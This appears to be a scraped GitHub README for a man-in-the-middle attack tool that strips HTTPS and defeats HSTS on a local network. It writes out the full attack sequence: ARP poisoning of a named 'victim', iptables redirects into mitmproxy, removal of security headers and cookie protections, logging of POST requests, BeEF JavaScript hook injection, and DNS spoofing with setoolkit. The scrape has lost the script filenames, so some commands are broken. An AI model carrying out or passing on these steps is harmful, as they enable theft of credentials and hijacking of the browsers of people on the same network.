Repository housing my 'man in the middle' project dealing with mitmproxy (Defeating HTTPS/HSTS, JS injection, DNS spoofing)
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


You can run

Usage: ./ [-g] [-n] [-s] [-x] [-j <js payload url>] [-d] [-i <interface>] gateway_ip target_ip
       [-g] interactive mode for mitmproxy
       [-n] capture HTTP traffic
       [-s] capture HTTPS traffic
       [-x] stripping https
       [-j] inject js payload
       [-d] dnsspoof + setoolkit
       [-i] interface

/!\ Working with Mitmproxy v1.0. Mitmproxy will be automatically downloaded and installed.

Example of command for full interception (HTTPS/HSTS stripping when possible, otherwise Upstream Certificates):

sudo ./ -g -n -s -x -i wlan0

You also can inject a javascript payload (for example Beef payload):

sudo ./ -g -n -j -i wlan0

Or run a DNS spoofing attack (will run dnsspoof and setoolkit):

sudo ./ -g -n -d -i wlan0

Of course you can run all these features together.

While intercepting trafic, we also aims at:

  • Dropping the following request headers: If-Modified-Since,Cache-Control,Upgrade-Insecure-Requests
  • Dropping the following response headers: Strict-Transport-Security,Public-Key-Pins,Content-Security-Policy,X-XSS-Protection,X-Frame-Options
  • Dropping meta tag Content-Security-Policy
  • Dropping cookies flags secure, HttpOnly
  • Stripping https:// links and redirections is automating the following steps:

  • activate ip forwarding (all secured connections will be routed without interception):
sysctl -w net.ipv4.ip_forward=1
  • avoid to send undesirable ICMP redirect messages
echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects
  • configure nat (8080 is the default listening port of mitmproxy):
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
  • and if you want to add HTTPS capture:
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

The REDIRECT target is used to redirect packets and streams to the machine itself. This means that we could for example REDIRECT all packets destined for the HTTP ports to an HTTP proxy (useful for transparent proxying).

  • run arp spoofing with calling the script
xterm -geometry 100x25+1+200 -hold -e arpspoof -t [ip victim] [ip route]
xterm -geometry 100x25+1+300 -hold -e arpspoof -t [ip route] [ip victim]

N.B: can try to force the arp poisoning of some boxes

  • check if arp poisoning is working on both ways with
python ./ [ip victim] [ip route]
  • run mitmproxy with our custom module, the module and the module. is logging only relevant POST requests (if you want to log trafic, -a <logfilename>):
mitmproxy -T --anticache --host --anticomp --noapp --script "./ ./requests.log" --script ./ --eventlog

N.B: mitmproxy (with option -w/-a for logging) will dump the whole flows in a tnetstrings format.

You can also run mitmdump (same as mitmproxy but non interactive):

mitmdump -T --anticache --host --anticomp --noapp --quiet --script "./ ./requests.log" --script ./"
  • if you want to extra log urls in a file:
urlsnarf > ./urlsnarf.txt &

Now go on a website with an unsecured (http) landing webpage and try to click on a link forwarding to a secure area. All trafic should stay clear between the victim and mitmproxy.
If you injected a Beef hook thanks to the -j option, also check the browser hooked in your Beef panel.

Don't hesitate to contribute to all of these modules.